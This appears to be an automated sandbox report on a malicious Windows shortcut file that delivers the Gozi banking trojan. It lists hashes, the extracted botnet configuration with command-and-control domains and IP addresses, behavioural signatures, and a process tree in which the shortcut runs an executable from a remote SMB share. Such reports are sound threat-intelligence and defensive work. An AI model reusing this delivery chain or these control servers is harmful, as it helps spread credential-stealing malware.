Analysis

  • max time kernel
    143s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/03/2023, 07:23

General

  • Target

    Normativa/Normativa.url

  • Size

    194B

  • MD5

    7223cc1975393443d4d161492d0f932e

  • SHA1

    2fc8c648559e862b3191088450781b5d33debd5f

  • SHA256

    ec178c6a29aa42213ac7287e45d8378632e145ef650dd5734f247129bd364dbb

  • SHA512

    5c5eec290b156c760c44dd9b7162a5cf9e3f2f4e1f9ef494dcbf5ef2f12fd51801b1170b36f39ab2342467f7701bfe4bd292b7cd5418c4b87717e7abfc31ef5a

Malware Config

Extracted

Family

gozi

Botnet

7715

C2

checklist.skype.com

62.173.142.50

31.41.44.87

109.248.11.217

212.109.218.151

5.44.45.83

62.173.142.81

193.233.175.113

109.248.11.184

212.109.218.26

185.68.93.7

Attributes
  • base_path

    /drew/

  • build

    250255

  • exe_type

    loader

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Normativa\Normativa.url
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2428
    • \??\UNC\109.248.11.227\Agenzia\server.exe
      "\\109.248.11.227\Agenzia\server.exe"
      2⤵
        PID:4780

    Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/4780-134-0x0000000002210000-0x000000000221B000-memory.dmp

            Filesize

            44KB

          • memory/4780-135-0x0000000002270000-0x000000000227D000-memory.dmp

            Filesize

            52KB

          • memory/4780-138-0x0000000000400000-0x00000000004DB000-memory.dmp

            Filesize

            876KB